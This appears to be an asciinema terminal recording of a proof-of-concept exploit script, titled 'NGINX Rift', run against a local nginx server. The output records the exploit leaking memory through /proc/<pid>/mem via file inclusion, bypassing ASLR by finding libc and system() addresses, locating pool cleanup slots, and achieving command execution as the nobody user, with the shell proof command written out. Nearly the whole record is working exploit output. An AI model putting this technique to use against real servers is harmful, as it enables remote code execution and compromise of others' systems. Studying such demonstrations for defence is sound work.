{"version":3,"term":{"cols":120,"rows":36,"type":"xterm-256color"},"timestamp":1779059040,"idle_time_limit":1.0,"command":"python3 -u tools/proc_mem_coreless_exploit.py --target 127.0.0.1:19321 --cmd id --target-len 6 --max-region 268435456 --max-final-candidates 5","title":"NGINX Rift coreless proc-mem ASLR bypass","env":{"SHELL":"/opt/homebrew/bin/fish"}}
[0.095, "o", "[*] worker=263 uid=65534 master=7\r\n[*] nginx_rw=0x555555659000 libc=0x7ffffefc0000 system=0x7fffff010d70\r\n"]
[0.001, "o", "[*] /proc/263/mem LFI sample: 00000000000000000890655555550000\r\n"]
[0.000, "o", "[*] held probe nonce=c580a30160fb target_low=303030303030\r\n"]
[9.191, "o", "[*] live mem slots: 115 safe / 2485 total\r\n[*] live mem pools: cleanup=14 probe=0 overwritten=0 matches=115\r\n"]
[2.668, "o", "[*] low-byte word diagnostic hits=0\r\n    match addr=0x5555556b2127 slot=3072 pool=0x5555556a7c08 cleanup=0x5555556a7e10\r\n    match addr=0x5555556b212f slot=3080 pool=0x5555556a7c08 cleanup=0x5555556a7e10\r\n    match addr=0x5555556b2137 slot=3088 pool=0x5555556a7c08 cleanup=0x5555556a7e10\r\n    match addr=0x5555556b2147 slot=3104 pool=0x5555556a7c08 cleanup=0x5555556a7e10\r\n"]
[0.000, "o", "    match addr=0x5555556b214f slot=3112 pool=0x5555556a7c08 cleanup=0x5555556a7e10\r\n    match addr=0x5555556b2157 slot=3120 pool=0x5555556a7c08 cleanup=0x5555556a7e10\r\n    match addr=0x5555556b215f slot=3128 pool=0x5555556a7c08 cleanup=0x5555556a7e10\r\n    match addr=0x5555556b2167 slot=3136 pool=0x5555556a7c08 cleanup=0x5555556a7e10\r\n    match addr=0x5555556b216f slot=3144 pool=0x5555556a7c08 cleanup=0x5555556a7e10\r\n    match addr=0x5555556b2177 slot=3152 pool=0x5555556a7c08 cleanup=0x5555556a7e10\r\n[*] closing held probe sockets to reset worker\r\n"]
[1.044, "o", "[*] final worker=264 system=0x7fffff010d70\r\n"]
[0.000, "o", "[*] proof command: sh -c 'id > /tmp/nginx_rift_proc_mem_3750f37e8af9 2>&1; printf '\"'\"'\\n__TOKEN__=1670e24c0bdcc1c4bb0e302609954351\\n'\"'\"' >> /tmp/nginx_rift_proc_mem_3750f37e8af9'\r\n"]
[0.000, "o", "[*] final candidate 1: addr=0x5555556b2127 slot=3072\r\n"]
[1.067, "o", "[+] coreless win via /proc/<pid>/mem candidate 1: 0x5555556b2127\r\n"]
[0.002, "o", "uid=65534(nobody) gid=65534(nogroup) groups=65534(nogroup)\r\n\r\n__TOKEN__=1670e24c0bdcc1c4bb0e302609954351\r\n\r\n"]
[0.011, "x", "0"]
